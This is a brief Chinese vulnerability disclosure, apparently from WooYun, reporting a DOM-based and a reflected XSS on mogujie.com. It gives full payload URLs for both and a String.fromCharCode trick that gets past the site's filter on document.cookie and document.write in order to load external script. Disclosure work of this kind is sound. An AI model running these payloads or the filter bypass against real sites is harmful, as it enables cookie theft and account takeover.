WooYun.org

先来重点的：首先是一个dom型xss，url参数输出在js里面。原始url在http://www.mogujie.com/upload/addpic?callback=parent;prompt(/test/);//&code=3002

刚开始弹窗很容易，可是剑心告诉我们缺乏可以影响他人帐号或数据的证明案例，于是要进一步利用。
果然弹document.cookie就弹不出来了

原来是被卡擦掉了，更换大小写也不行。包括document.write document.body.append都被卡擦掉了。
但是妹纸还是要跨的，怎么绕？用object.func 等同于object["func"]，
于是有document.cookie === document[String.fromCharCode(99,111,111,107,105,101)]

成功pia出。
然后构造payload时用document[String.fromCharCode(119,114,105,116,101)] 代替 document.write。
这个网页木有body，所以调用document.body.append会null object... 还是用document.append。
调用外部js效果如下

——————————————
另外一个就是平常的反射xss了，直接弹cookie，木有过滤
http://www.mogujie.com/magic/brand/1qi?keyword=1%3C%2ftitle%3E%3Cscript%3Eprompt%28document.cookie%29%3C/script%3E